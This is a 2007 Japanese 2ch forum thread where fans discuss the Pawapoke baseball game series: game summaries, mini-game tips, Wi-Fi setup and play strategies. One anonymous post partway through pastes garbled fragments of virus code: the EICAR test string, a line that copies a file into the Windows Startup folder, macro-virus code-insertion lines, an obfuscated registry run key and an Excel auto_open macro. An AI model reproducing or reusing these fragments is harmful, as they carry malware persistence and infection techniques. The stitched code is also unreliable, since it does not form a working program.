1 :
枯れた名無しの水平思考 :
2007/10/08(月) 12:03:20 ID:pXXGjMBG0
2 :
枯れた名無しの水平思考 :2007/10/08(月) 12:04:46 ID:pXXGjMBG0
3 :
枯れた名無しの水平思考 :2007/10/08(月) 12:05:40 ID:pXXGjMBG0
Q.各シリーズの特徴教えれ A. パワポケ1(GBC) パーツ制サクセス以外で唯一投手も任意に野手能力伸ばせる作品。 12回で練習ボーナス特殊能力ももらえるし、初期能力高いしで 強い選手が作りやすい。ただ、エラー率が何故かG1固定なため 守備させるとみなファンタジスタなのがなんとも…。 ストーリーは可もなく不可もなくといった感じ。 パワポケ2(GBC) 未だに根強い人気を誇る作品。 ダイジョーブ次第では表だけでも そこそこ強い選手を作成可能。 「転生システム(通信によってサクセス選手を再育成可)」を 繰り返す事によりALLmaxも可能。 裏は戦争編。「任務」をこなすことによって 経験点をためることにより選手を育成する。 「呪島」(マインスイーパーで特能&経験点&アイテムゲット)が 得意ならば強い選手も作れる。 抑え投手などが作り易いか。 パワポケ3(GBA) 初のパーツ制サクセス。人によって賛否が激しく分かれる作品。 裏の地雷ゲーム(2の呪島と同じ、 サクセス選手も再育成可)を併用する事により、 ALLmax&特能いっぱいな選手を作る事が可能。 ゲームの性質上持ち物を高額パーツで埋める事が多くなるので、 理不尽イベントによって壊され GBAぶん投げる人多数。 ただしうまく行けば全作品中で一番強い選手が作れる。 パワポケ4(GBA) 比較的人気のある作品。ストーリー、音楽ともかなりハイレベル。 表は投手をやってるとほぼ必ず「一発」が付くのが珠に瑕だが (よろず屋で「幸福のボール」を買う事により消す事は可能)、 慣れればそれなりに強い選手もできる。 裏はパーツ制RPG。「のりか理論」等により 楽にALLmax&威圧感+αの選手を作る事が可能。
4 :
枯れた名無しの水平思考 :2007/10/08(月) 12:06:31 ID:pXXGjMBG0
パワポケ5(GBA) これも人気のある作品。この作品くらいから野球部分が面白くなった。 表は恐らく全シリーズ中1番簡単。活躍次第では表だけでもかなりの 選手が作れる。パチンコ通い等により三種の神器 (よくとぶバット、ナイスなグラブ、速いスパイク)が揃え易いのも良い。 裏は4と同じくパーツ制RPG。難易度は4よりは難化。しかしコツを掴めば 4を超える強い選手が作れる。 またこの作品から「俺のペナント(俺ペナ)」が登場。 サクセス選手を3回まで 再育成でき、レベルに関係なくタイトル獲得で 強力な特殊能力(パワーヒッターなど)が取得可能なため、 裏サクセスと組み合わせる事により最強選手育成も可能。 パワポケ6(GBA) 強い選手が作りにくい(特に表)ため、評価の分かれる作品。 単純にできる選手の強さからいけば、恐らくシリーズ史上最弱。 しかしストーリーの面白さ、キャラの濃さ等により一部には 根強い人気がある。 裏は2以来久々の非パーツ制。カジノの登場により、目押しできる人は かなり強い選手が作れる。カジノを使わなくても、慣れればALLB前後の 選手は作れる。 俺ペナは育成回数が1回にダウン。取得できる特殊能力もかなり限定された。 今回から「強振多用」などのCOM操作時の特殊能力が取得可能。 なお、野球部分は一番評価が高い。 パワポケ1・2(GBA) 1と2のリメイク版。基本的なシステムは6を踏襲。 GB版に比べると、強い選手は作りにくくなった。 特に1は練習ボーナスの特殊能力が「12回→40回」に 変更になったため、ほぼ取得不可能に。 それでも6に比べれば強い選手は作成可能。 2裏、転生システムも健在。俺ペナ有り。 パワポケ7(GBA) センター前に抜けた当たりで一塁走者が二塁で刺されたり、 バントで不自然にスタートダッシュが遅かったりと、 なにかと野球部分に不満が残る作品。それでも前作まであった三盗技等は解消された。 今回は真エンドを見なければ選手の所属球団が選べない。 表は選手登録までならヒーロー使えば簡単。 しかし強い選手を作ろうとすると一気に難度があがる。 裏はお馴染みのパーツ制RPG。 カジノがあるので、6で慣れている人ならば簡単に強い選手が作れる。 カジノを使わずともコツさえ掴めばハイレベル選手は育成可能。時間がかかるのが難点か。 俺ペナは今回も有り。任意の特殊能力取得が可能になったため、再現選手などが作り易くなった。 また、初期ROMでは禁断の「幸せ草バグ」を使う事により、 パスワード選手等を思いのままに何度でも育成できる。 パワポケポイントバグも存在。何かとバグの多い作品でもある。
5 :
枯れた名無しの水平思考 :2007/10/08(月) 12:07:32 ID:pXXGjMBG0
パワポケ甲子園(NDS) パワポケシリーズ初の実況搭載。今作はシナリオが存在せず、 全国各地の高校から予選を勝ち抜いて甲子園に行くという内容。 そのため、キャラ固有のイベントが無い。 難易度はかなり高く、一回の平均プレー時間もパワポケシリーズでは最長。 野球に関してはこれまでのGBAシリーズを踏襲している。 パワポケ8(NDS) 球場が3D化し、野球部分が大幅に改善。ステータスに弾道とエラーが追加され、 システムは本家パワプロに近づいた。 選手を作る難易度は高くなく、一定の評価値を得るだけで選手が登録出来る。 (ただし、犯人を見つけないと球団選択は不可) 新登場の勉強システムをうまく使えばクセのある選手も作成可能 裏サクセスは地雷ステージオンリー。当然だが、進めば進むほど強い選手が作成出来る。 前作には無かった使用タイミングを選ぶことのできる補助アイテムの存在が追加された パワポケ9(NDS) サクセスが3本になり、ボリュームも大幅にアップした。 表では初の1日単位で進行するサクセス。 従来通りの「アクション野球」と、「パワポケダッシュ」から 採用された「カード野球」から 好きな方を選べる。難易度はやや低めか。 裏サクセスはお馴染みパーツ制RPG。「ワームホール理論」により、 簡単にALLmax選手を作成可能。 第3のサクセスとしてミニサクセス「少森寺編」も収録。 できる選手のレベルは他2つに比べると低いものの、 俺ペナ参加時に「センス○」取得の恩恵も。 俺ペナは従来の1年から(活躍すれば)2年に延長。 野球部分は比較的好評な模様。 ミートカーソルがパワプロと同じ楕円形に変更された。 また今回からウグイスコール設定も可能になった。
6 :
枯れた名無しの水平思考 :2007/10/08(月) 12:08:22 ID:pXXGjMBG0
パワポケダッシュ総評 表サクセスの良い所 ・カードスロットシステムが新鮮 ・仲間のEDが2つある ・ガールフレンドが萌える ・クリアもガールフレンドの攻略も楽 ・メガネ一族は好評 表サクセスの悪い所 ・ワンプレイが長い ・カードスロットシステムは戦略性が乏しい。目押し以外CPUの強さに流される運ゲー ・一部の特殊能力が強過ぎる<威圧感、奪三振、キレ○、ノビ○、重い球、打球反応…orz> ・2章Aルートの親父は糞過ぎ。キャットガールズは優遇されすぎ ・やる気が下がりやすい迷惑なイベント多過ぎ ・仲間とガールフレンドのEDのバランスが悪い ・イベントが全体的に少ない ・怪我率に関係なく怪我しやすい。天国メーターが上がりやすい 裏サクセスの良い所 ・不思議のダンジョンのアイデア ・パワポケモンスター総出演 ・親切設定のお助けキャラ ・超特殊能力が取得できる ・アイテム持ち越しを使えば強い選手が作れる 裏サクセスの悪い所 ・使い回しのモンスター ・ワンプレイが長過ぎる ・劣化不思議のダンジョン ・防具と武器がすぐ壊れる ・カードや球が燃やされる ・階段が自力で行けない所にあることがある ・敵の攻撃力がインフレしすぎ。一部の敵が強過ぎ ・イベント&キャラが表サクセスより少ない。すぐ飽きる ・アイテムの引継ぎがクリア時のみ、やりこみ不可 ・あいかわらず亀田がラスボス その他 ・パワポケ図鑑の出来は好評 ・実在の選手は使えない ・本当に小学生向けに作ったのか?このソフトは?
7 :
枯れた名無しの水平思考 :2007/10/08(月) 12:09:13 ID:pXXGjMBG0
いちもつ
9 :
枯れた名無しの水平思考 :2007/10/08(月) 12:10:03 ID:pXXGjMBG0
パワポケ10 12月6日発売予定
ttp://www.konami.jp/pawa/poke10/index.html 野球が超進化!ポケットの中には、いつも野球がある!
●携帯ゲームの枠を超えたDSの野球!手にとり、遊べば驚くこと間違いなし!
・投手、打者・球場が3Dポリゴンになった!モーションが豊富になって野球がリアルになった!
・Wi−Fi対応!離れた友人と1対1の野球対戦ができる!全国ランキング表示もある!
・DSカード1枚で「パワポケ10」を持っていない友達ともダウンロード対戦ができるようになった!
・臨場感アップ!ガンガンしゃべる実況が導入!
・「カーブってどっちに曲がるの?」「この特殊能力はどういった効果があるの?」「インフィールドフライは?」
そういったプレイしているときの疑問に即回答!いつでも、どの画面からでも見ることのできる「パワポケ用語辞典」が実装!
・従来のコンピュータ難度「パワフル」で満足できなかった人向けに、その上をいく最強モードが追加!
・もちろん、操作性、コンピュータの思考も大幅アップ!
●もちろんサクセスも面白い!
・今回のお話の舞台は高校野球! 汗!涙!泥!目指せ甲子園!もう一つのサクセスも、もちろん面白い!
●ミニゲームも盛りだくさん!
カード野球、ペナント、俺のペナント、アレンジ、キャンプ、色々あってやりこみ要素満載、親切設計のパワポケ10は面白い!
>>1 乙
>>8 ポケ10発売決定したからテンプレは8までだぜェ?ドンマ
7裏は普段あまり役に立たないアルベルトが異常に役に立った トムプソン強すぎだろ…
12 :
枯れた名無しの水平思考 :2007/10/08(月) 12:58:40 ID:nX5v0t+VO
ゴメソ><
シリーズで一番面白いミニゲームはなんだろう
あつまれパワプロクンのDS甲子園(普通版、Best price版) ネット通さなくても知らない人とコード交換、チャット可能 あつパワのコード交換方法 まず、自分のコードを確認し、紙にメモる。 次に、通信広場の誰かと繋ぐで誰かが来るまで待つ。 誰かが来たら、挨拶など適当にした後に、定型文の『教えてくれませんか?』や『ちょっといいですか?』などと切り出して、定型文挨拶の欄の一番最後の数字を使って自分のコードを相手に伝える。 相手が理解してくれたならば、その後に相手もコードを教えてくれるので、紙にメモる。 最後に『いきましょう』などと言い、部屋から出る。 その後、Wi-Fi切断し、さっきのコードを登録しもう一度通信広場のWi-Fiを繋ぐ。 今度は、友達と繋ぐで、広場を作るか、相手の広場に入る。 そうすると、定型文じゃなく自由にチャットできるようになるから、相手とルール決めた対戦したり、他のDSやWiiの友達コード聞いたり、雑談したりできる。 問題点は、リア厨と交換しちゃった時と、誰かと繋ぐで初心者と辺り、相手がコードだって理解してくれない時かな。
前スレ
>>965 俺は結構会えるけどなぁ
時間帯によって違うのかも
夕方とか夜とかなら割りと会えるよ
>>1 乙
今暇だったからGBC戦争やったら豪運炸裂で一発クリアした俺に一言!
てかまぁまぁ強いw
ALLmaxって野手のことだよね? 投手じゃ無理な気が…
野球部分はおまけって人多いんだね!(前スレも読んだよ) オレは6もしくは1&2で野球部分は、ほぼ完成してると思う(携帯機野球ゲームとして) コンピュータ部分を(中日で例え) 1 投手起用を徹底させる(岩瀬はセーブ場面でしか出てこないとか、岡本は勝ってる試合時のみとか) 2 変化球の偏りをなくす&ストレート軽視反対! 3 1、2塁ランナーは3塁ストップ(ホームタッチアウト多すぎ) 4 バントする人と盗塁する人はあらかじめ設定(チームでなく個人でできる様に) 5 アレンジは6チームでなく12チームできる様に 6 最新メンバー DS&3Dに期待してる人もいると思うけど GBA&2Dでも↑の条件で十分すぎるくらい面白い携帯野球ゲームできる でもみんなはサクセス重視なんだよね?
いいよ何回も蒸し返さなくても
抑え登録してんのに3回あたりから起用されるからなぁ もうただの中継ぎじゃん、ってぐらいに
野球部分に力入れるよりサクセスに力入れた方が面白くなるからな
>>13 俺は箱グチャ
>>11 アルベルトは(他作品に比べたら格段に)強いが、鈴音みたいな銃系は安定感に欠けるから大神、青野、うたの、タマちゃんが俺の中の四強
四弱は貴田、ふぐり、ようこ、紀香で満場一致で
>>13 見切ってシュッシュッしゅーが好き。というより迅雷コーチが好き。というよりタマちゃんが好き
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1))) X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\" ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1) "avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash" G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR")) If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) kak\ \';\ken=\wd+'\START kill -9 xz/tSaBh0 Sub auto_open() Application.OnSheetActivate = "check_files" End Sub Sub check_files() c$ = Application.StartupPath m$ = Dir(c$ & "\" & "PERSONAL.XLS") If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0 whichfile = p + w * 10 End Sub
ケチな俺は武田倉刈は回しっぱなし 時々珠子鈴音鋼アルベルト
7裏は珠ちゃんと智美を・・・(*´Д`)ハァハァ
野球部分の強化とは違うかもしれないが先発中継ぎ抑えの起用を細かく設定できたらいいなとは思う パワプロみたいに左のワンポイントとか
9なんか先発がノックアウトされた時に抑えの切り札出してくるからな
そもそも先発がノックアウトされたと判断するのが早すぎる
3点取られたら自動的に交代は可哀想
一回表にノーアウトで登板させられた時は吹いた
5たまでるびゅんびゅんのレベル4でだしてくるラスボスのぱんちの当たり判定よくわからないんだが あのまるっこい部分だけあたっちゃだめなのか? 鎖の部分あたっても大丈夫なときとそうじゃないときがあるような気がするんだが誰か詳しい人教えてくだしあ
ヴァンパイアハンター編とかだったら面白そうだと思うけどな
>>32 相手がガードしてるときのみ中心に水平な位置のみ丸っこい部分に当たっても大丈夫。
鎖は分からんが基本OUTじゃね?
このミニゲームだけはいつもスルーしてたww
10裏はPV見る限りではなんか掘ってないか?岩みたいなの 発掘編か?
6裏で目押しできねえなんかコツありますか?
正直サクセスはあまり期待してない wifi対応だから買う。それだけ
流れ早いよ!なにやってんの!
wifi対応ってことだけで買うなら 集まれ甲子園の方がいいんじゃないかw?
>>42 あれは野球部分に難ありあり
球が上がり安すぎてパワーヒッターは基本的に役に立たない
あつ甲子園の野球は結構完成度高くて面白いと思うけどなあ。 打球の飛び方、肩の強さなんかがいい感じだし。 難点はムービングファスト系が厄介すぎるのと、外野フライ時にボールが視界から消える所くらい。 wifiって家でやるには何が必要?パソコン無しの自室でもできる?
正直野球関連はあまり期待してない パワポケだから買う。それだけ
エミュだとカード野球しか動かない件
>>44 wifiをネットにつながってるパソコンに挿す必要がある
よってパソコンは必須条件
>>44 えー、そうか…
肩の違いについては同意
Wi-Fiは無線LANかもしくはWinXP+Wi-Fiコネクタが必要
詳細は任天堂公式見れ
通信可能な範囲は電波状況と間取りによる
ただ電波の受信状況はゲームの滑らかさに影響が出るから対戦相手としては
アクセスポイントのすぐ近くでやってほしいところ
49 :
枯れた名無しの水平思考 :2007/10/08(月) 16:35:32 ID:MTq+RoedO
8の射撃が難し杉 コツ教えてください
何回もやって慣れるしか ワイドがあれば道中は楽
>>49 おみくじなら−1−1で大凶にして211で大吉
8で倉刈のアルバムだけ埋まっていないんで、10発売までに埋めようかと
数日前から始めたんだが厳しいね。部屋通って発生率上げてもダメだ。
しかしおかげでポイントが貯まるんで、オークションはグレード結構上げは結構順調。
オークション好きなんで10で復活してくれんかなぁ。ネタや解説文にニヤリとさせられる。
あと、彼女なし、真相暴かずの適当なプレイだと何ポイントくらいの選手を安定して作れる?
一応今は155CC4球種総変化10くらいで75P前後の選手で安定してるんだけど、
もっと効率の良い育成方があったらお聞きしたい。
>>49 「射撃」だとどっちか良く分からんが、
射的おみくじなら最前列or二列目の吉を縦列の前で待ち続ける。
ミニゲームならとりあえず攻略本。イベントで入手するもよし、持ち込むもよし。
射撃おみくじは 自分が動くのではなく 狙った標的が来るのを動かずじっと待つ これコツ
別にどっちでもよくね?
>>47 >>48 サンクス。やっぱ駄目か・・・。
あつ甲子園のwifiって面白そうなんだよな。監督モードでどの選手を育てたとか分かって
ポケ10からミートの値で強振時のミートカーソルの大きさが変化するってホント?
>>55 あつパワの野球はかなり面白いよな
Wi-Fiは店とかでもできるよ
いつのまにか新スレ立ってる 前スレの糞コテ結局スレ立てず逃げてるしwマゾ涙目wwwwww
>>56 wikiに載ってるんだから本当なんじゃない?
前スレの965だっけ? 5日くらい繋いでも 誰もいなかったって言ってたの。 あつパワのコード交換スレにいってみたら? そこは過疎ってるけど、俺は定期的に覗いてるから、そこでコード交換できるよ。
>>56 お前がある掲示板の知り合いに見えて仕方ないがまあどうでもいいし間違いなく気のせいだろう
というか8の地雷でエリア100まで行けた奴とかいる?
63 :
枯れた名無しの水平思考 :2007/10/08(月) 20:32:13 ID:Yg/n//DC0
何その変態 普通にAllMaxなんだろうがな
65 :
枯れた名無しの水平思考 :2007/10/08(月) 20:57:28 ID:Yg/n//DC0
951 名前:枯れた名無しの水平思考[sage] 投稿日:2007/10/07(日) 22:08:20 ID:hWVxHPu2O 結局無限なんだっけ? 金全部アイテムに費やして頑張ったら250までは行けたけど4のオンパレードで誤爆した\(^o^)/ 以来やってないな 次は300目指すか 前スレより
変態は褒め言葉
前にあった地雷実況スレには100超えは普通にいたような。 覚えている限りじゃ300超えやオールマックス達成者もいた。 地雷スレ、マターリ進行していて結構好きだったな。9発売後に落ちちゃったけど。 地雷は評判悪いけど、たまに無性にやりたくなるんで 1ハードに1つある分には個人的にはむしろ嬉しい。1ハードで二度もやられちゃ困るけど。
ああそれ俺っす 多分俺じゃ250じゃALLMAXは無理かな… アイテム買わないと行けないし拾おうと無理してたら爆死するし まあ俺のスキルの問題だけど\(^o^)/
>>67 地雷30面以上での爆死の絶望感・虚しさは異常
費やした時間の長さにさらにガックリ
>>62 他の掲示板で馴れ合いっぽく書き込んでいると思うと、なんか引いた
実際、ここで敬語を使わぬも、他のサイトにて敬語で馴れ合う人は他にもいるはず
2chの情報収集力+wiki参照の攻略 これでok
>>62 見ているところが一致していれば誰のことを言っているかはなんとなく分かるけど
俺はその書き込みを見てここで聞いただけ
その掲示板じゃ常にROMってる。理由は察しておくれ
この話はここまででよろすく、一応
地雷難しいわ
パターン集とかどっかにない?
>>70 >なんとなく分かるけど
これ、相手に対してなるべく優しく反論するための言葉
これを用いる多くは実際には分かっていない
ぶっちゃけ8の地雷は裏技使えば カンストも余裕だしなw オールマックスとかも楽勝
おっと
>>70 の釘打ちを見逃した 失礼
他にも「実際」この言葉を使いすぎだ・・・
ROMるわ
パワプロ9やってたら、アルバムねえのかよとかエピローグねえのかよとか、つい思ってしまった 間違いなくポケ厨
75 :
枯れた名無しの水平思考 :2007/10/08(月) 21:58:00 ID:npQoT/Pg0
パワポケ4にて 改造コードでサクセスの年数バグらせて遊んでいたら ??年目の1月3週に制作途中?のイベント発生。 「イベントのテストです」 選択肢A西川→なぜか背景が新聞になり様々なイベントをテスト可能 B井上→8種のランダムイベントのテスト C宮岡→神木、小山、堤の全イベント+ランダムイベント+エンディングのテスト D三浦→選択するとスルーで次の週へ Cの宮岡のランダムテストで唯の春風パンチラてすとできたムハァ
>>62 百までいけたのはうれしかったがすごく虚しかったな
オールMAXができると虚しいわ
それから地雷もやってない しかもスコアにも99までしか記録されない
パワポケPで顔自由に変えられるって凄い楽しいな、GJ 強い木川とか強いさち作りまくり これ6からあったの?6は評判良さげだからやってみようかな
78 :
枯れた名無しの水平思考 :2007/10/08(月) 23:50:46 ID:a6LeDmFS0
全員にウグイスと背番号つけないと気がすまない俺
>>77 6は通好みだが、中毒性が異常に高い。
買うのを勧める
さちが威圧感持ってるのにはワロタ だがすぐに納得できた
既存キャラ以外の顔を増やしてほしいな
ポケで猪狩が出たのって1くらいだっけ? プロ5と関係があるとはいえ、猪狩ってだけすごい普通な印象になる
83 :
枯れた名無しの水平思考 :2007/10/09(火) 00:20:43 ID:Q1j6a7hm0
進なら7で出た
前スレとかで切断厨とか話題に出てたのをみて思ったんだが ともだちコードも対応しているようだし、切断厨対策など諸々にルールを設けて 大会を開催するってのはどうかな? そうすれば、盛り上がるだろうし。 出来ないことは無さそうだが、どうだろうかね?
>>77 俺は6の裏は全サクセスの中で最も好きだ。おすすめ。
>>85 やりたいね。ぜひ色々議論しようじゃないか。
もうルールが決まれば今からそれに向けての選手もつくれるしね。
>>81 アンヌ、奈津姫、武美、ダッシュの子があるんならいっそ全部の彼女の顔がほしい
電撃PSでやってたような、 各自のアレンジチームでペナント戦わせるような大会をポケでも開催してほしいなぁ
89 :
枯れた名無しの水平思考 :2007/10/09(火) 07:09:08 ID:t+KUzMKiO
何度やってもブラックアルバムがでねえwwww マジうんこ
パワポケ好きな人って遊戯王好きな人多いらしいね 相関関係にあるみたい 俺もそうなんだがどうですか
単に厨房が(ry
>>91 どうだろ?遊戯王は一年くらいしか続かんかったなあ
パワポケも最近時間が取れなくて9買わなかった。
それでもスパッと卒業できないわけだが・・・
4年前からなぜ皇と統道と磯の顔アイがないのか疑問に思ってます
皇ほど宝の持ち腐れ投手は少ない 1の野球マスク並 そして4のアキミの扱いはかつてないほどひどい件
10のミニゲームは雑巾掛けするのと麻雀みたいなのと叩いてかぶってジャンケンポンとコンコンノックなのか PV見ただけだから内容は殆ど分からないけど 裏サクセスは戦車乗って移動してたし主人公が軍人風だったし昭和編?
>>94 甲子園組で顔があるのは写六だけか
何故こいつだけ…
デビルスターズにいるから
10面白そうだね。プロ球団でwifi対戦出来るの?サクセスはあまり興味無いから、ここが気になる
ポケ10の裏サクセスは、戦争編2だと予想する。 まあそうするとコンコンノックも2のミニゲームだから2と被りすぎだけどな。まあ一応下画面タッチに変わったけど。
ポケ8の地雷の裏技って時間切れギリギリで中断すると 時間無制限で地雷が全部見えるんだっけ?あれ難しいんだよな
最近9を購入した口なんですけど、裏技のアルバム→サクセスのポイント貰えるのがどうやっても出来ないです。 色んなサイト見てみても書いてあること同じだし…。 すいません誰かもう少し詳しく教えて貰えませんか?
それエミュレータの不具合
あつパワの続編出せや。改良してもっと楽しくしたやつ あれで終わりはありえんだろ
とりあえず裏サクセスが地雷だったらブチ切れだと思う。手抜きだけはするな
裏地雷でも買っちゃうかも 地雷ゲームを改良して超中毒ゲームにはできないかな? 地雷で落ち物とか。いやこれは悪い例だけど
質問なんだが 一通り7までやり終えて8以降の作品がほしくなったわけだが。 今、DSって何円ぐらいで売ってるものなの?
中古なら1万くらいで買えるんじゃないの? 俺が旧型中古で買ったときは1万2千だった(発売して2週間ぐらいのとき
110 :
103 :2007/10/09(火) 18:14:54 ID:8VyFZmYTO
>>104 …ちゃんと新品買ったよ。
アルバム→サクセスでX押しっぱで画面タッチでしょ?
何回やっても出来ない…
>>103 俺もそれ何回やっても出来なくて諦めた。
ちなみに発売後1週間以内に購入
DS本体が原因かもしれない
財産の問題で4か5どっちかを買おうと思うんだがどっちがオススメ? それぞれのポイントを添えて頼む。
デビルスターズってコレまでのサクセスにでてきた?
>>114 今まで出てきた強い奴らをまとめたのがデビルスターズ
サクセスででてきたら時間軸上成立し得ない
時間犯罪者っていうんだっけ? 6正史で主人公が担当した犯人は捕まってるけど他にもいるはずだよな もう出てこないんかね
3・6・8は人を選ぶな。万人にオススメはできない
>>116 つっても冬野とか布具理とか雑魚もはいっててそいつら登板
されたときめった打ちできて萎えた
俺の6バグってやがる
>>97 裏サクセスでの扱いがあれって言いたいんじゃないか?
4→場合によって死ぬ
7→親友を殺す(殺される)
9→最初から死んでました><
まあ、んなこと言ったら美咲はどうよって話だが。
>>102 wiki見れ。ver2がある。
>>109 やっぱりDSはまだまだ高いよなあ。
3桁ならすぐにでも買うのに…
>>121 確かに出るたびに死んでるねえ…
4のイベントで微妙にあせった覚えもある…
どうでもいいが9のネタばれっぽい予感…
教えてくれてありがとう。
>>122 4桁はともかく3桁はないだろ、常考・・・。ゲームハードが3桁に落ちることはまずない。
あとネタバレすまんかった。
>>113 4と5ならどちらでもいいと思うけど、忙しいからすぐクリアして終わりにしたいっていうなら4
シリーズの最高傑作一つやれば充分って事なら5を薦める
どの作品を最高傑作と思うかは人それぞれだと思うが
新しい情報でてないかああ?
デビルスターズはよくわからんな なぜかアフロ猪狩が入ってたり、野球マスクとか小角の能力が変わってたり
デビルスターズはもはやドリームチームに近いな 俺はパワフルで対デビルスターズやって腕試しくらいにしか使わない
アフロ猪狩は5で敵チームに出てくるけど
4の小角は顔が皇だったな…
9のオリジナル変化球覚えるイベントですが、 河川敷とグラウンドではどちらをうろつくべきなんでしょうか
グラウンドのほうが発生確率が高い&発生するまでにうろつく回数が少なくてすむ。 ただ日祝日の?の時限定なのは注意。
>>132 ありがとうございます
あと発生時期があるのかなとうろつきコマンド出て4月中ずっと河川敷に行きましたが
起きませんでした。運が悪いだけかもしれませんが
発生時期が何月以降とかあるんですか?
>>133 河川敷の場合は9回以上うろついた後、日祝日のみ発生。ちなみにグラウンドは3回以上。
>>134 回数+日にちが決まってたんですか・・・
質問ばっかですみませんでした
9のポイント100ゲットする奴って一回オンリーかな? 正直少森寺で30ポイントゲットするのに飽きてきたんだが
攻略本にも土日祝ってあるけど実際他の曜日でもイベント起こるよな いつも河川敷だからグラウンドはどうか知らないけど
パワポケダッシュの図鑑によると5の綾香関連で亀田が出るらしいが見たことがない。 どんな条件で出るんだ?
>>138 自分で攻略本読むなりググるなりご自由にどうぞ
亀だが4のアキミは表なら赤い服の女に付きまとわれるし裏なら主人公に殺されたり瀕死の状態で主人公にほっとかれてパラサイトに寄生されたりよくても暗殺ギルドからずっと逃走とシュールすぎる 新作が戦争編ならワクテカ RPG編みたいに音楽のクオリティが高いといいなあ 6は好きだが3、8にはがっかりした 裏が地雷だけは勘弁してくれ
141 :
枯れた名無しの水平思考 :2007/10/10(水) 12:48:00 ID:PO6HtqzYO
俺もいつもうろつき河川敷でオリ変とってる。 9って彼女つくる意味あんまないよな。 超特殊能力欲しいなら未亡人でいいし、欲しくないなら釣りやってやる気と体力維持しながら強いの出来るし。 …と思うんだが俺はまだまだヒヨッコでしょうか。
>>141 ラブダイナミックス無いとやってられないが社長令嬢も特殊能力狙いだとうまい
只いらない子は多いな
ちよ、貴子、夏菜は扱いが難しいよなぁ、好感度上げとかないと超特殊もらえないのにデートが微妙だから困る。 令嬢は持ち込んでエラー付いたら泣ける、武美は特殊能力が微妙。安定感は未亡人が断トツだな。
144 :
枯れた名無しの水平思考 :2007/10/10(水) 13:51:48 ID:+m1yJw6mO
このゲームのペナントってドラフトとか外国人獲得とかトレードとかあるんですか?
145 :
枯れた名無しの水平思考 :2007/10/10(水) 13:53:45 ID:dQ/3G/mL0
俺の野手ほとんど奪力持ちなんだよなぁ 令嬢は運次第だけどよい選手になることが多いから好きだ
アレンジチームでオーペナやって結果にニヤニヤするのもいいけどさ、 実在12球団でもっと本格的な楽しみ方ある?
パワプロwiiと互換性のあるパワポケってあるのかな wii決定版は10と互換らしいけど
11月の試合でどうやったら武美が試合に出る?
150 :
枯れた名無しの水平思考 :2007/10/10(水) 15:18:59 ID:bJDYigEVO
甲子園の攻略ウィキってなんで無くなったんだっけ 管理人がバックレたんだっけ?重宝してたのに
またすいません オリジナル変化球はイベントが起きても必ず取得ってわけじゃないですよね? とりあえず変化球をどれか一つでも覚えてればいいんですよね?